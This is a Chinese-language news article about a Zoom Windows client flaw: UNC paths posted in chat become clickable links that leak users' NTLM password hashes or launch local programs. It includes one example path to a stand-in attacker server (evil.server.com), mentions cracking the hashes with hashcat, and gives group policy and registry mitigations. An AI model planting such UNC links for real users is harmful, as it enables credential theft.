近日,windows 版 zoom 客户端爆出了容易受到 nuc 路径注入攻击的安全漏洞。作为一款音视频会议应用,zoom 还允许用户在聊天界面通过发送文本消息来互相交流。然而外媒 bleeping computer 指出,攻击者可利用聊天模块的漏洞,窃取点击了相关链接的用户的 windows 登陆凭据。
【unc 注入示例】
发送聊天消息时,所有发送的 url 都将经过转换,以便群内其他成员点击,继而在默认的浏览器中打开网页。
然而安全研究人员 @ _g0dmode 发现,zoom 客户端竟然还将 windows 网络 unc 路径,也转换成了聊天消息中可单击的链接。
如图所示,常规 url 和 nuc 路径(\\evil.server.com\images\cat.jpg),都被转换成了聊天消息中的可点击链接。
【捕获的 ntlm 密码哈希值】
若用户单击 unc 路径链接,则 windows 将尝试使用 smb 文件共享协议连接到远程站点,以打开远程路径中的 cat.jpg 文件。
默认情况下,windows 将发送用户的登录名和 ntlm 密码哈希值,但稍有经验的攻击者均可借助 hashcat 之类的免费工具来逆向运算。
【简单密码可在 16 秒内被暴力破解】
安全研究人员 matthew hickey(@ hackerfantastic)实测发现,其能够在 zoom 中顺利注入,并且可以借助当前的民用级 gpu 和 cpu 来快速破解。
除了窃取 windows 登陆凭据,hickey 还向 bleeping computer 透露,通过点击链接的方式,unc 注入还适用于启动本地计算机上的程序(比如 cmd 命令提示符)。
【程序运行提示】
庆幸的是,windows 会在程序被执行前发出是否允许其运行的提示。想要堵上这一漏洞,zoom 必须阻止 windows 客户端的 unc 路径转换功能(屏蔽部分可点击的超链接)。
据悉,hickey 已经在 twitter 上向 zoom 官方发去了有关该安全漏洞的通知,但目前尚不清楚该公司已采取怎样的行动。
注重安全的客户,可在官方补丁发布前,通过组策略来限制向远程服务器传出 ntlm 通信(参考如下操作):
计算机配置 -> windows 设置 -> 安全设置 -> 本地策略 -> 安全选项 -> 网络安全:限制ntlm -> 发送到远程服务器的 ntlm 通信(然后全部配置为拒绝)。
需要注意的是,如果在已经加入相关域的计算机上配置上述组策略时,可能会在尝试访问共享时遇到问题。
如果是无权访问组策略设置 windows 10 家庭版用户,亦可使用注册表编辑器来完成相关限制操作(dword 配置为 2):
[hkey_local_machine\system\currentcontrolset\control\lsa\msv1_0]"restrictsendingntlmtraffic"=dword:00000002
如需正确创建此键值,windows 用户记得以管理员身份来启动注册表编辑器。
若日后有必要恢复默认发送 ntlm 凭据的 windows 行为,也只需删除对应的 restrictsendingntlmtraffic 键值。
试用申请